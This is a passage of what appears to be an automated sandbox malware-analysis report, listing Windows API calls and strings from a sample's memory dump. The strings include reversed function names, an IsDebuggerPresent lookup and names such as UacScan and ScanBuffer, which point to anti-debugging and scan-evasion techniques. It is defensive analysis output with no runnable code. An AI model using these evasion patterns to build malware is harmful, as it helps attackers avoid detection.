                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                      • GetProcAddress.KERNEL32(?,?), ref: 028A8125
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: Kernel32$sserddAcorPteG
                      • API String ID: 667068680-1372893251
                      APIs
                      • GetThreadLocale.KERNEL32(?,00000000,0289AA67,?,?,00000000), ref: 0289A9E8
                        • Part of subcall function 0289A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0289AA67,?,?,00000000), ref: 0289AA18
                      • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0289AA23
                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0289AA67,?,?,00000000), ref: 0289AA41
                      • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0289AA4C
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Locale$InfoThread$CalendarEnum
                      • String ID:
                      • API String ID: 4102113445-0
                      APIs
                      • GetThreadLocale.KERNEL32(?,00000000,0289AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0289AAAF
                        • Part of subcall function 0289A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Locale$InfoThread
                      • String ID: eeee$ggg$yyyy
                      • API String ID: 4232894706-1253427255
                      APIs
                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,028A8088,?,?,00000000,?,028A79FE,ntdll,00000000,00000000,028A7A43,?,?,00000000), ref: 028A8056
                        • Part of subcall function 028A80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(?,?), ref: 028A8125
                      • GetModuleHandleA.KERNELBASE(?), ref: 028A806A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: HandleModule$AddressProc
                      • String ID: AeldnaHeludoMteG$KernelBASE
                      • API String ID: 1883125708-1952140341
                      APIs
                      • GetModuleHandleW.KERNEL32(KernelBase,?,028AF3CC,UacInitialize,028F237C,028BB40C,UacScan,028F237C,028BB40C,ScanBuffer,028F237C,028BB40C,OpenSession,028F237C,028BB40C,ScanString), ref: 028AEFCE
                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 028AEFE0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: IsDebuggerPresent$KernelBase
                      • API String ID: 1646373207-2367923768
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,028BD10B,00000000,028BD11E), ref: 0289C3FA
                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0289C40B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                      • API String ID: 1646373207-3712701948
                      APIs
                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0289E217
                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0289E233
                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0289E2AA
                      • VariantClear.OLEAUT32(?), ref: 0289E2D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: ArraySafe$Bound$ClearIndexVariant
                      • String ID:
                      • API String ID: 920484758-0
                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0289ACD9
                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0289ACFD
                      • GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 0289AD18
                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0289ADAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileModuleName$LoadQueryStringVirtual
                      • String ID:
                      • API String ID: 3990497365-0
                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0289ACD9
                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0289ACFD
                      • GetModuleFileNameA.KERNEL32(02890000,?,00000105), ref: 0289AD18
                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0289ADAE
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FileModuleName$LoadQueryStringVirtual
                      • String ID:
                      • API String ID: 3990497365-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      APIs
                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0289955A), ref: 028994F2
                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0289955A), ref: 028994F8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: DateFormatLocaleThread
                      • String ID: yyyy
                      • API String ID: 3303714858-3145165042
                      APIs
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AAD90
                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 028AADC0
                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 028AADDF
                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 028AADEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmp
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Read$Write
                      • String ID:
                      • API String ID: 3448952669-0